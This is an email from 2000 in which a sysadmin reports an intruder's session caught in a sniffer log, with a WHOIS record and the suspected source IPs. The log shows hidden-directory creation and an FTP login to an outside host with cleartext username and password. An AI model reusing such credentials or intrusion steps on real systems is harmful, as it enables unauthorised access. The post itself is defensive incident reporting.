I was looking through the sniff log (only 2 days of data
preserved) to e-mail the sysadmins of probed/cracked sites
when I found this:
---------
: ls
: mkdir /^H.a
: mkdir .a
: cd .a
: ftp ftp.xoom.com
USER chrometnt
PASS phorce31337
---------
Smells of a skript-kiddie... falls into his own latrine...
---------
Registrant:
XOOM.com, Inc. (XOOM2-DOM)
300 Montgomery St., 3rd Floor
San Francisco, CA 94104
Domain Name: XOOM.COM
Administrative Contact, Technical Contact, Zone Cont
Smith, Dave (DS8987) dave_at_XOOM.COM
(415) 288-2500 (FAX) (415) 288-2580
Billing Contact:
Administrator, Billing (AB401-ORG) billing_at_XOOM
(415) 288-2500
Fax- (415) 288-2580
Record last updated on 12-Jul-1999.
Record created on 03-Dec-1996.
Database last updated on 8-Jan-2000 12:47:34 EST.
Domain servers in listed order:
NAME.ROC.FRONTIERNET.NET 209.130.187.10
NAME.PHX.FRONTIERNET.NET 206.165.6.10
NS1.XOOM.COM 206.132.185.58
NS2.XOOM.COM 206.132.185.59
NS3.XOOM.COM 206.132.185.199
---------
This was ON another host!! (local to us). I will be sending
their full info in to Pitt's security folks and to root_at_host.
User(s) doing the connecting/cracking:
Name: mel-0511-145.ports.iprimus.net.au
Address: 202.138.39.145
*AND*
Name: mel-0212-234.ports.iprimus.net.au
Address: 203.134.25.234
*AND*
Name: ppp-003.cust20.adl.chariot.net.au
Address: 210.9.20.3
Cheers,
Filip G.
Filip "I'll buy a vowel" Gieszczykiewicz | http://www.repairfaq.org/
(filipg_at_corona.eps.pitt.edu)
I am the river itself and the leaf floating its currents.
I am steering. I am swept. I am.
Received on Jan 10 2000